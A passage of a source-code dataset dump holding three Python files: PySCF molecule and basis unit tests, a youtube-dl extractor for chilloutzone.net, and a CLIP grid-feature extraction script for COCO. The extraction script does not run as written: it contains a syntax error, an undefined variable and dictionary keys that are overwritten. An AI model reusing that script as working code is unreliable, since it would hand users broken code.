test_default_basis(self):\n mol = gto.M(atom=[['h' , 0,1,1], [\"O1\", (0.,0.,0.)], [1, 1.,1.,0.],],\n basis={'default':'321g', 'O1': 'sto3g'})\n self.assertEqual(sorted(mol._basis.keys()), ['H', 'O1'])\n\n def test_parse_pople_basis(self):\n self.assertEqual(len(gto.basis.load('6-31G(d)' , 'H')), 2)\n self.assertEqual(len(gto.basis.load('6-31G(d)' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31Gs' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31G*' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(d,p)' , 'H')), 3)\n self.assertEqual(len(gto.basis.load('6-31G(d,p)' , 'C')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(2d,2p)' , 'H')), 4)\n self.assertEqual(len(gto.basis.load('6-31G(2d,2p)' , 'C')), 7)\n self.assertEqual(len(gto.basis.load('6-31G(3df,3pd)', 'H')), 6)\n self.assertEqual(len(gto.basis.load('6-31G(3df,3pd)', 'C')), 9)\n\n def test_parse_basis(self):\n mol = gto.M(atom='''\n 6 0 0 -0.5\n 8 0 0 0.5\n 1 1 0 -1.0\n 1 -1 0 -1.0''',\n basis='''\n#BASIS SET: (3s) -> [2s]\nH S\n 5.4471780 0.1562849787 \n 0.82454724 0.9046908767 \nH S\n 0.18319158 1.0000000 \n#BASIS SET: (6s,3p) -> [3s,2p]\nC S\n 172.2560000 0.0617669 \n 25.9109000 0.3587940 \n 5.5333500 0.7007130 \nC SP\n 3.6649800 -0.3958970 0.2364600 \n 0.7705450 1.2158400 0.8606190 \nC SP\n 0.1958570 1.0000000 1.0000000 \n#BASIS SET: (6s,3p) -> [3s,2p]\nO S\n 322.0370000 0.0592394 \n 48.4308000 0.3515000 \n 10.4206000 0.7076580 \nO SP\n 7.4029400 -0.4044530 0.2445860 \n 1.5762000 1.2215600 0.8539550 \nO SP\n 0.3736840 1.0000000 1.0000000 \n''')\n self.assertTrue(mol.nao_nr() == 22)\n\n def test_ghost(self):\n mol = gto.M(\n atom = 'C 0 0 0; ghost 0 0 2',\n basis = {'C': 'sto3g', 'ghost': gto.basis.load('sto3g', 'H')}\n )\n self.assertEqual(mol.nao_nr(), 6)\n\n mol = gto.M(atom='''\n ghost-O 0.000000000 0.000000000 2.500000000\n X_H -0.663641000 -0.383071000 3.095377000\n ghost.H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis='631g')\n self.assertEqual(mol.nao_nr(), 26)\n\n def test_nucmod(self):\n gto.filatov_nuc_mod(80)\n self.assertEqual(gto.mole._parse_nuc_mod(1), gto.NUC_GAUSS)\n self.assertEqual(gto.mole._parse_nuc_mod('Gaussian'), gto.NUC_GAUSS)\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.nucmod = 'G'\n mol1.verbose = 5\n mol1.nucprop = {'H': {'mass': 3}}\n mol1.output = '/dev/null'\n mol1.build(False, False)\n mol1.set_nuc_mod(0, 2)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n self.assertAlmostEqual(mol1._env[mol1._atm[0,gto.PTR_ZETA]], 2, 9)\n self.assertAlmostEqual(mol1._env[mol1._atm[1,gto.PTR_ZETA]], 586314366.54656982, 4)\n\n mol1.set_nuc_mod(1, 0)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n\n mol1.nucmod = None\n mol1.build(False, False)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n\n mol1.nucmod = {'H': gto.filatov_nuc_mod}\n mol1.build(False, False)\n self.assertTrue(mol1._atm[0,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n self.assertTrue(mol1._atm[1,gto.NUC_MOD_OF] == gto.NUC_POINT)\n self.assertTrue(mol1._atm[2,gto.NUC_MOD_OF] == gto.NUC_GAUSS)\n\n def test_zmat(self):\n coord = numpy.array((\n (0.200000000000, -1.889726124565, 0.000000000000),\n (1.300000000000, -1.889726124565, 0.000000000000),\n (2.400000000000, -1.889726124565, 0.000000000000),\n (3.500000000000, -1.889726124565, 0.000000000000),\n (0.000000000000, 0.000000000000, -1.889726124565),\n (0.000000000000, 1.889726124565, 0.000000000000),\n (0.200000000000, -0.800000000000, 0.000000000000),\n (1.889726124565, 0.000000000000, 1.133835674739)))\n zstr0 = gto.cart2zmat(coord)\n zstr = '\\n'.join(['H '+x for x in zstr0.splitlines()])\n atoms = gto.zmat2cart(zstr)\n zstr1 = gto.cart2zmat([x[1] for x in atoms])\n self.assertTrue(zstr0 == zstr1)\n\n numpy.random.seed(1)\n coord = numpy.random.random((6,3))\n zstr0 = gto.cart2zmat(coord)\n zstr = '\\n'.join(['H '+x for x in zstr0.splitlines()])\n atoms = gto.zmat2cart(zstr)\n zstr1 = gto.cart2zmat([x[1] for x in atoms])\n self.assertTrue(zstr0 == zstr1)\n\n def test_c2s(self): # Transformation of cart <-> sph, sph <-> spinor\n c = mol0.sph2spinor_coeff()\n s0 = mol0.intor('int1e_ovlp_spinor')\n s1 = mol0.intor('int1e_ovlp_sph')\n sa = reduce(numpy.dot, (c[0].T.conj(), s1, c[0]))\n sa+= reduce(numpy.dot, (c[1].T.conj(), s1, c[1]))\n mol0.cart = True\n s2 = mol0.intor('int1e_ovlp')\n mol0.cart = False\n self.assertAlmostEqual(abs(s0 - sa).max(), 0, 12)\n c = mol0.cart2sph_coeff()\n sa = reduce(numpy.dot, (c.T.conj(), s2, c))\n self.assertAlmostEqual(abs(s1 - sa).max(), 0, 12)\n\n c0 = gto.mole.cart2sph(1)\n ca, cb = gto.mole.cart2spinor_l(1)\n ua, ub = gto.mole.sph2spinor_l(1)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c0 = gto.mole.cart2sph(0, normalized='sp')\n ca, cb = gto.mole.cart2spinor_kappa(-1, 0, normalized='sp')\n ua, ub = gto.mole.sph2spinor_kappa(-1, 0)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c1 = gto.mole.cart2sph(0, numpy.eye(1))\n self.assertAlmostEqual(abs(c0*0.282094791773878143-c1).max(), 0, 12)\n\n c0 = gto.mole.cart2sph(1, normalized='sp')\n ca, cb = gto.mole.cart2spinor_kappa(1, 1, normalized='sp')\n ua, ub = gto.mole.sph2spinor_kappa(1, 1)\n self.assertAlmostEqual(abs(c0.dot(ua)-ca).max(), 0, 9)\n self.assertAlmostEqual(abs(c0.dot(ub)-cb).max(), 0, 9)\n\n c1 = gto.mole.cart2sph(1, numpy.eye(3).T)\n self.assertAlmostEqual(abs(c0*0.488602511902919921-c1).max(), 0, 12)\n\n def test_bas_method(self):\n self.assertEqual([mol0.bas_len_cart(x) for x in range(mol0.nbas)],\n [1, 3, 1, 1, 1, 1, 1, 3, 3, 3, 6, 6, 1, 3])\n self.assertEqual([mol0.bas_len_spinor(x) for x in range(mol0.nbas)],\n [2, 4, 2, 2, 2, 2, 2, 6, 6, 6, 10, 10, 2, 4])\n c0 = mol0.bas_ctr_coeff(0)\n self.assertAlmostEqual(abs(c0[:,0]/c0[0,0] - (1,3,1)).max(), 0, 9)\n self.assertAlmostEqual(abs(c0[:,1] - (0,1,0)).max(), 0, 9)\n\n self.assertRaises(ValueError, mol0.gto_norm, -1, 1.)\n\n def test_nelectron(self):\n mol0.nelectron = mol0.nelectron\n mol0.nelectron = mol0.nelectron\n mol0.spin = 2\n self.assertRaises(RuntimeError, lambda *args: mol0.nelec)\n mol0.spin = 1\n\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.nelec, (5, 4))\n mol1.nelec = (3, 6)\n self.assertEqual(mol1.nelec, (3, 6))\n\n def test_multiplicity(self):\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.multiplicity, 2)\n mol1.multiplicity = 5\n self.assertEqual(mol1.multiplicity, 5)\n self.assertEqual(mol1.spin, 4)\n self.assertRaises(RuntimeError, lambda:mol1.nelec)\n\n def test_ms(self):\n mol1 = copy.copy(mol0)\n self.assertEqual(mol1.ms, 0.5)\n mol1.ms = 1\n self.assertEqual(mol1.multiplicity, 3)\n self.assertEqual(mol1.spin, 2)\n self.assertRaises(RuntimeError, lambda:mol1.nelec)\n\n def test_atom_method(self):\n aoslice = mol0.aoslice_by_atom()\n for i in range(mol0.natm):\n symb = mol0.atom_pure_symbol(i)\n shls = mol0.atom_shell_ids(i)\n nshls = aoslice[i][1] - aoslice[i][0]\n self.assertEqual(shls[0], aoslice[i][0])\n self.assertEqual(len(shls), nshls)\n self.assertEqual(mol0.atom_nshells(i), nshls)\n aoslice = mol0.aoslice_2c_by_atom()\n self.assertEqual([x[2] for x in aoslice], [0, 8, 56])\n self.assertEqual([x[3] for x in aoslice], [8, 56, 64])\n\n def test_dump_loads(self):\n import json\n tmpfile = tempfile.NamedTemporaryFile()\n lib.chkfile.save_mol(mol0, tmpfile.name)\n mol1 = gto.Mole()\n mol1.update(tmpfile.name)\n self.assertEqual(json.loads(mol1.dumps()), json.loads(mol0.dumps()))\n tmpfile = None\n mol1.loads(mol1.dumps())\n mol1.loads_(mol0.dumps())\n mol1.unpack(mol1.pack())\n mol1.unpack_(mol0.pack())\n\n def test_set_geom(self):\n mol1 = gto.Mole()\n mol1.verbose = 5\n mol1.set_geom_(mol0._atom, 'B', symmetry=True)\n mol1.set_geom_(mol0.atom_coords(), 'B', inplace=False)\n\n mol1.symmetry = False\n mol1.set_geom_(mol0.atom_coords(), 'B')\n mol1.set_geom_(mol0.atom_coords(), inplace=False)\n mol1.set_geom_(mol0.atom_coords(), unit=1.)\n mol1.set_geom_(mol0.atom_coords(), unit='Ang', inplace=False)\n\n def test_apply(self):\n from pyscf import scf, mp\n self.assertTrue(isinstance(mol0.apply('RHF'), scf.rohf.ROHF))\n self.assertTrue(isinstance(mol0.apply('MP2'), mp.ump2.UMP2))\n self.assertTrue(isinstance(mol0.apply(scf.RHF), scf.rohf.ROHF))\n self.assertTrue(isinstance(mol0.apply(scf.uhf.UHF), scf.uhf.UHF))\n\n def test_with_MoleContext(self):\n mol1 = mol0.copy()\n with mol1.with_rinv_as_nucleus(1):\n self.assertTrue(mol1._env[gto.PTR_RINV_ZETA] != 0)\n self.assertAlmostEqual(abs(mol1._env[gto.PTR_RINV_ORIG+2]), 0.46288647587915266, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 0, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n with mol1.with_rinv_as_nucleus(0):\n self.assertAlmostEqual(abs(mol1._env[gto.PTR_RINV_ORIG+2]), 1.8515459035166109, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n\n with mol1.with_rinv_zeta(20):\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 20, 9)\n mol1.set_rinv_zeta(3.)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ZETA], 0, 9)\n\n with mol1.with_rinv_origin((1,2,3)):\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 3, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_RINV_ORIG+2], 0, 9)\n\n with mol1.with_range_coulomb(20):\n self.assertAlmostEqual(mol1._env[gto.PTR_RANGE_OMEGA], 20, 9)\n mol1.set_range_coulomb(2.)\n self.assertAlmostEqual(mol1._env[gto.PTR_RANGE_OMEGA], 0, 9)\n\n with mol1.with_common_origin((1,2,3)):\n self.assertAlmostEqual(mol1._env[gto.PTR_COMMON_ORIG+2], 3, 9)\n self.assertAlmostEqual(mol1._env[gto.PTR_COMMON_ORIG+2], 0, 9)\n\n mol1.set_f12_zeta(2.)\n\n def test_input_symmetry(self):\n mol1 = gto.Mole()\n mol1.atom = 'H 1 1 1; H -1 -1 1; H 1 -1 -1; H -1 1 -1'\n mol1.unit = 'B'\n mol1.symmetry = True\n mol1.verbose = 5\n mol1.output = '/dev/null'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 4.2517312170868475, 9)\n\n mol1 = gto.Mole()\n mol1 = gto.Mole()\n mol1.atom = 'H 0 0 -1; H 0 0 1'\n mol1.cart = True\n mol1.unit = 'B'\n mol1.symmetry = 'Dooh'\n mol1.verbose = 5\n mol1.output = '/dev/null'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1 = gto.Mole()\n mol1.atom = 'H 0 -1 0; H 0 1 0'\n mol1.unit = 'B'\n mol1.symmetry = True\n mol1.symmetry_subgroup = 'D2h'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1.atom = 'H 0 0 -1; H 0 0 1'\n mol1.unit = 'B'\n mol1.symmetry = 'Coov'\n mol1.symmetry_subgroup = 'C2'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), 0.69980902201036865, 9)\n\n mol1.atom = 'H 1 0 -1; H 0 0 1'\n mol1.symmetry = 'Coov'\n self.assertRaises(RuntimeWarning, mol1.build)\n\n mol1.atom = '''\n C 0. 0. 0.7264\n C 0. 0. -.7264\n H 0.92419 0. 1.29252\n H -.92419 0. 1.29252\n H 0. 0.92419 -1.29252\n H 0. -.92419 -1.29252'''\n mol1.symmetry = True\n mol1.symmetry_subgroup = 'C2v'\n mol1.build()\n self.assertAlmostEqual(lib.finger(mol1.atom_coords()), -0.5215310671099358, 9)\n\n def test_search_ao_label(self):\n mol1 = mol0.copy()\n mol1.atom = mol0.atom + ['Mg 1,1,1']\n mol1.ecp['Mg'] = 'lanl2dz'\n mol1.basis['Mg'] = 'lanl2dz'\n mol1.build(0, 0)\n self.assertEqual(list(mol1.search_ao_label('O.*2p')), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label('O1 2p')), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label(['O.*2p','0 H 1s'])), [0, 10,11,12])\n self.assertEqual(list(mol1.search_ao_label([10,11,12])), [10,11,12])\n self.assertEqual(list(mol1.search_ao_label(lambda x: '4d' in x)), [24,25,26,27,28])\n mol1.ao_labels(fmt='%s%s%s%s')\n mol1.sph_labels(fmt=None)\n mol1.cart = True\n self.assertEqual(list(mol1.search_ao_label('4d')), [25,26,27,28,29,30])\n mol1.ao_labels(fmt='%s%s%s%s')\n mol1.ao_labels(fmt=None)\n mol1.cart = False\n mol1.spinor_labels()\n mol1.spinor_labels(fmt='%s%s%s%s')\n mol1.spinor_labels(fmt=None)\n\n def test_input_ecp(self):\n mol1 = gto.Mole()\n mol1.atom = mol0.atom\n mol1.ecp = 'lanl2dz'\n mol1.build(False, False)\n gto.basis.load_ecp('lanl08', 'O')\n gto.format_ecp({'O':'lanl08', 1:'lanl2dz'})\n self.assertRaises(KeyError, gto.format_ecp, {'H':'lan2ldz'})\n\n def test_condense_to_shell(self):\n mol1 = mol0.copy()\n mol1.symmetry = False\n mol1.build(False, False)\n v = gto.condense_to_shell(mol1, mol1.intor('int1e_ovlp'), numpy.max)\n self.assertAlmostEqual(lib.finger(v), 5.7342530154117846, 9)\n\n def test_input_ghost_atom(self):\n mol = gto.M(\n atom = 'C 0 0 0; ghost 0 0 2',\n basis = {'C': 'sto3g', 'ghost': gto.basis.load('sto3g', 'H')}\n )\n\n mol = gto.M(atom='''\n ghost1 0.000000000 0.000000000 2.500000000\n ghost2 -0.663641000 -0.383071000 3.095377000\n ghost2 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis={'ghost1':gto.basis.load('sto3g', 'O'),\n 'ghost2':gto.basis.load('631g', 'H'),\n 'O':'631g', 'H':'631g'}\n )\n\n mol = gto.M(atom='''\n ghost-O 0.000000000 0.000000000 2.500000000\n ghost_H -0.663641000 -0.383071000 3.095377000\n ghost:H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''', basis='631g')\n\n mol = gto.M(atom='''\n X1 0.000000000 0.000000000 2.500000000\n X2 -0.663641000 -0.383071000 3.095377000\n X2 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''',\n basis={'X1':gto.basis.load('sto3g', 'O'),\n 'X2':gto.basis.load('631g', 'H'),\n 'O':'631g', 'H':'631g'}\n )\n\n mol = gto.M(atom='''\n X-O 0.000000000 0.000000000 2.500000000\n X_H1 -0.663641000 -0.383071000 3.095377000\n X:H 0.663588000 0.383072000 3.095377000\n O 1.000000000 0.000000000 2.500000000\n H -1.663641000 -0.383071000 3.095377000\n H 1.663588000 0.383072000 3.095377000\n ''', basis='631g')\n\n def test_conc_mole(self):\n mol1 = gto.M(atom='Mg', ecp='LANL2DZ', basis='lanl2dz')\n mol2 = mol1 + mol0\n self.assertEqual(mol2.natm, 4)\n self.assertEqual(mol2.nbas, 18)\n self.assertEqual(mol2.nao_nr(), 42)\n mol2 = mol0 + mol1\n self.assertEqual(mol2.natm, 4)\n self.assertEqual(mol2.nbas, 18)\n self.assertEqual(mol2.nao_nr(), 42)\n n0 = mol0.npgto_nr()\n n1 = mol1.npgto_nr()\n self.assertEqual(mol2.npgto_nr(), n0+n1)\n mol2 = mol2 + mol2\n mol2.cart = True\n self.assertEqual(mol2.npgto_nr(), 100)\n\n def test_intor_cross(self):\n mol1 = gto.M(atom='He', basis={'He': [(2,(1.,1))]}, cart=True)\n s0 = gto.intor_cross('int1e_ovlp', mol1, mol0)\n self.assertEqual(s0.shape, (6, 34))\n s0 = gto.intor_cross('int1e_ovlp', mol0, mol1)\n self.assertEqual(s0.shape, (34, 6))\n s0 = gto.intor_cross('int1e_ovlp_cart', mol0, mol1)\n self.assertEqual(s0.shape, (36, 6))\n\n def test_energy_nuc(self):\n self.assertAlmostEqual(mol0.get_enuc(), 6.3611415029455705, 9)\n self.assertAlmostEqual(gto.M().energy_nuc(), 0, 9)\n\n def test_fakemol(self):\n numpy.random.seed(1)\n coords = numpy.random.random((6,3))*4\n vref = 0\n mol = mol0.copy()\n for c in coords:\n mol.set_rinv_origin(c)\n vref += mol.intor('int1e_rinv')\n\n fakemol = gto.fakemol_for_charges(coords)\n pmol = mol + fakemol\n shls_slice = (0, mol.nbas, 0, mol.nbas, mol.nbas, pmol.nbas)\n v = pmol.intor('int3c2e', comp=1, shls_slice=shls_slice)\n v = numpy.einsum('pqk->pq', v)\n self.assertAlmostEqual(abs(vref-v).max(), 0, 12)\n\n def test_to_uncontracted_cartesian_basis(self):\n pmol, ctr_coeff = mol0.to_uncontracted_cartesian_basis()\n c = scipy.linalg.block_diag(*ctr_coeff)\n s = reduce(numpy.dot, (c.T, pmol.intor('int1e_ovlp'), c))\n self.assertAlmostEqual(abs(s-mol0.intor('int1e_ovlp')).max(), 0, 9)\n\n mol0.cart = True\n pmol, ctr_coeff = mol0.to_uncontracted_cartesian_basis()\n c = scipy.linalg.block_diag(*ctr_coeff)\n s = reduce(numpy.dot, (c.T, pmol.intor('int1e_ovlp'), c))\n self.assertAlmostEqual(abs(s-mol0.intor('int1e_ovlp')).max(), 0, 9)\n mol0.cart = False\n\n\nif __name__ == \"__main__\":\n print(\"test mole.py\")\n unittest.main()\n"} {"ext": "py", "sha": "1a2f77c4eb3883d36294dbe9e2921e5aaa2e7656", "content": "import json\n\nfrom .common import InfoExtractor\nfrom .youtube import YoutubeIE\nfrom ..compat import compat_b64decode\nfrom ..utils import (\n clean_html,\n ExtractorError\n)\n\n\nclass ChilloutzoneIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?chilloutzone\\.net/video/(?P[\\w|-]+)\\.html'\n _TESTS = [{\n 'url': 'http://www.chilloutzone.net/video/enemene-meck-alle-katzen-weg.html',\n 'md5': 'a76f3457e813ea0037e5244f509e66d1',\n 'info_dict': {\n 'id': 'enemene-meck-alle-katzen-weg',\n 'ext': 'mp4',\n 'title': 'Enemene Meck - Alle Katzen weg',\n 'description': 'Ist das der Umkehrschluss des Niesenden Panda-Babys?',\n },\n }, {\n 'note': 'Video hosted at YouTube',\n 'url': 'http://www.chilloutzone.net/video/eine-sekunde-bevor.html',\n 'info_dict': {\n 'id': '1YVQaAgHyRU',\n 'ext': 'mp4',\n 'title': '16 Photos Taken 1 Second Before Disaster',\n 'description': 'md5:58a8fcf6a459fe0a08f54140f0ad1814',\n 'uploader': 'BuzzFeedVideo',\n 'uploader_id': 'BuzzFeedVideo',\n 'upload_date': '20131105',\n },\n }, {\n 'note': 'Video hosted at Vimeo',\n 'url': 'http://www.chilloutzone.net/video/icon-blending.html',\n 'md5': '2645c678b8dc4fefcc0e1b60db18dac1',\n 'info_dict': {\n 'id': '85523671',\n 'ext': 'mp4',\n 'title': 'The Sunday Times - Icons',\n 'description': 're:(?s)^Watch the making of - makingoficons.com.{300,}',\n 'uploader': 'Us',\n 'uploader_id': 'usfilms',\n 'upload_date': '20140131'\n },\n }]\n\n def _real_extract(self, url):\n mobj = self._match_valid_url(url)\n video_id = mobj.group('id')\n\n webpage = self._download_webpage(url, video_id)\n\n base64_video_info = self._html_search_regex(\n r'var cozVidData = \"(.+?)\";', webpage, 'video data')\n decoded_video_info = compat_b64decode(base64_video_info).decode('utf-8')\n video_info_dict = json.loads(decoded_video_info)\n\n # get video information from dict\n video_url = video_info_dict['mediaUrl']\n description = clean_html(video_info_dict.get('description'))\n title = video_info_dict['title']\n native_platform = video_info_dict['nativePlatform']\n native_video_id = video_info_dict['nativeVideoId']\n source_priority = video_info_dict['sourcePriority']\n\n # If nativePlatform is None a fallback mechanism is used (i.e. youtube embed)\n if native_platform is None:\n youtube_url = YoutubeIE._extract_url(webpage)\n if youtube_url:\n return self.url_result(youtube_url, ie=YoutubeIE.ie_key())\n\n # Non Fallback: Decide to use native source (e.g. youtube or vimeo) or\n # the own CDN\n if source_priority == 'native':\n if native_platform == 'youtube':\n return self.url_result(native_video_id, ie='Youtube')\n if native_platform == 'vimeo':\n return self.url_result(\n 'http://vimeo.com/' + native_video_id, ie='Vimeo')\n\n if not video_url:\n raise ExtractorError('No video found')\n\n return {\n 'id': video_id,\n 'url': video_url,\n 'ext': 'mp4',\n 'title': title,\n 'description': description,\n }\n"} {"ext": "py", "sha": "1a2f77e0bf0fac1106bb1d67ddd967a8c53e35f8", "content": "#!/usr/bin/env python3\n\n\"\"\"\nGrid features extraction script.\n\"\"\"\nimport argparse\nimport os\nimport torch\nimport tqdm\nfrom fvcore.common.file_io import PathManager\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.engine import default_setup\nfrom detectron2.evaluation import inference_context\nfrom detectron2.modeling import build_model\nimport numpy as np\nfrom clip.clip import load\nimport torch.nn as nn\nfrom torchvision.transforms import Compose, Resize, CenterCrop, ToTensor, Normalize\n\nfrom grid_feats import (\n add_attribute_config,\n build_detection_test_loader_with_attributes,\n)\nfrom timm.models.vision_transformer import resize_pos_embed\nimport timm\n\n# A simple mapper from object detection dataset to VQA dataset names\ndataset_to_folder_mapper = {}\ndataset_to_folder_mapper['coco_2014_train'] = 'train2014'\ndataset_to_folder_mapper['coco_2014_val'] = 'val2014'\ndataset_to_folder_mapper['coco_2014_val'] = 'trainval2014'\ndataset_to_folder_mapper['coco_2014_train'] = 'trainval2014'\n# One may need to change the Detectron2 code to support coco_2015_test\n# insert \"coco_2015_test\": (\"coco/test2015\", \"coco/annotations/image_info_test2015.json\"),\n# at: https://github.com/facebookresearch/detectron2/blob/master/detectron2/data/datasets/builtin.py#L36\ndataset_to_folder_mapper['coco_2015_test'] = 'test2015'\ndataset_to_folder_mapper['coco_2015_test-dev'] = 'test-dev2015'\n\n\ndef extract_grid_feature_argument_parser():\n parser = argparse.ArgumentParser(description=\"Grid feature extraction\")\n parser.add_argument(\"--config-file\", default=\"\", metavar=\"FILE\", help=\"path to config file\")\n parser.add_argument(\"--dataset\", help=\"name of the dataset\", default=\"coco_2014_train\",\n choices=['coco_2014_train', 'coco_2014_val', 'coco_2015_test', 'coco_2015_test-dev'])\n parser.add_argument('--model_type', default='RN50', type=str, help='RN50, RN101, RN50x4, ViT-B/32, vit_base_patch32_224_in21k')\n\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n return parser\n\ndef extract_grid_feature_on_dataset(model, data_loader, dump_folder):\n for idx, inputs in enumerate(tqdm.tqdm(data_loader)):\n with torch.no_grad():\n image_id = inputs[0]['image_id']\n file_name = '%d.pth' % image_id\n # compute features\n images = model.preprocess_image(inputs)\n features = model.backbone(images.tensor)\n outputs = model.roi_heads.get_conv5_features(features)\n # modify the filename\n file_name = inputs[0]['file_name'].split(\"/\")[-1].replace(\"jpg\", \"npy\")\n outputs = outputs.permute(0, 2, 3, 1)\n\n with PathManager.open(os.path.join(dump_folder, file_name), \"wb\") as f:\n # save as CPU tensors\n np.save(f, outputs.cpu().numpy())\n\ndef do_feature_extraction(cfg, model, dataset_name, args):\n with inference_context(model):\n dump_folder = os.path.join(cfg.OUTPUT_DIR, \"features\", dataset_to_folder_mapper[dataset_name])\n PathManager.mkdirs(dump_folder)\n data_loader = build_detection_test_loader_with_attributes(cfg, dataset_name, args.model_type='clip')\n extract_clip_feature_on_dataset(model, data_loader, dump_folder, args)\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n add_attribute_config(cfg)\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n # force the final residual block to have dilations 1\n cfg.MODEL.RESNETS.RES5_DILATION = 1\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\ndef extract_clip_feature_on_dataset(model, data_loader, dump_folder, args):\n if args.model_type != 'vit_base_patch32_224_in21k':\n save_args.model_type = args.model_type.split(\"-\")[0]\n mean = torch.Tensor([0.48145466, 0.4578275, 0.40821073]).to(\"cuda\").reshape(3, 1, 1)\n std = torch.Tensor([0.26862954, 0.26130258, 0.27577711]).to(\"cuda\").reshape(3, 1, 1)\n dump_folder = f\"clip/{save_args.model_type}/\" + dump_folder.split(\"/\")[-1]\n else:\n save_args.model_type = 'vit_base'\n mean = torch.Tensor([0.5, 0.5, 0.5]).to(\"cuda\").reshape(3, 1, 1)\n std = torch.Tensor([0.5, 0.5, 0.5]).to(\"cuda\").reshape(3, 1, 1)\n dump_folder = f\"clip/{save_args.model_type}/\" + dump_folder.split(\"/\")[-1]\n print(model.pos_embed.shape)\n num_patches = 558 #600 * 1000 // 32 // 32\n print(num_patches)\n pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, 768, device='cuda'),)\n pos_embed.weight = resize_pos_embed(model.pos_embed, pos_embed)\n model.pos_embed = pos_embed\n\n if args.model_type == \"ViT-B/32\":\n num_patches = 558 #600 * 1000 // 32 // 32\n print(num_patches)\n pos_embed = nn.Parameter(torch.zeros(num_patches + 1, 768, device='cuda'),)\n pos_embed.weight = resize_pos_embed(model.visual.positional_embedding.unsqueeze(0), pos_embed.unsqueeze(0))\n model.visual.positional_embedding = pos_embed\n \n\n if not os.path.exists(dump_folder):\n os.makedirs(dump_folder)\n for idx, inputs in enumerate(tqdm.tqdm(data_loader)):\n with torch.no_grad():\n image_id = inputs[0]['image_id']\n file_name = inputs[0]['file_name'].split(\"/\")[-1].replace(\"jpg\", \"npy\")\n # compute features\n image = inputs[0]['image'].to(\"cuda\").float() / 255.0\n \n image = (image - mean) / std\n image = image.unsqueeze(0)\n if \"RN\" in args.model_type:\n outputs = model.encode_image(image)\n elif args.model_type == 'vit_base_patch32_224_in21k':\n outputs = model(image)\n else:\n x = model.visual.conv1(image.half()) # shape = [*, width, grid, grid]\n x = x.reshape(x.shape[0], x.shape[1], -1) # shape = [*, width, grid ** 2]\n x = x.permute(0, 2, 1) # shape = [*, grid ** 2, width]\n x = torch.cat([model.visual.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1) # shape = [*, grid ** 2 + 1, width]\n x = x + model.visual.positional_embedding.to(x.dtype)[:x.shape[1], :]\n x = model.visual.ln_pre(x)\n\n x = x.permute(1, 0, 2) # NLD -> LND\n\n for layer_idx, layer in enumerate(model.visual.transformer.resblocks):\n if layer_idx != 11:\n x = layer(x) \n\n outputs = x.permute(1, 0, 2)\n\n \n if \"RN\" in args.model_type:\n outputs = outputs.permute(0, 2, 3, 1)\n else:\n outputs = outputs[:, 1:, :].reshape(1, 18, 31, 768)\n \n\n with PathManager.open(os.path.join(dump_folder, file_name), \"wb\") as f:\n # save as CPU tensors\n np.save(f, outputs.float().cpu().numpy())\n\ndef main(args):\n cfg = setup(args)\n if args.model_type != 'vit_base_patch32_224_in21k':\n model, transform = load(args.model_type, jit=False) \n else:\n model = timm.create_model(args.model_type, pretrained=True)\n model = model.cuda()\n \n do_feature_extraction(cfg, model, args.dataset, args)\n\n\nif __name__ == \"__main__\":\n args = extract_grid_feature_argument_parser().parse_args()\n print(\"Command Line Args:\", args)\n main(args)\n"} {"ext": "py", "sha": "1a2f78bddc95220e0649a236efd36e6f5f82c8ab", "content": "# Licensed under 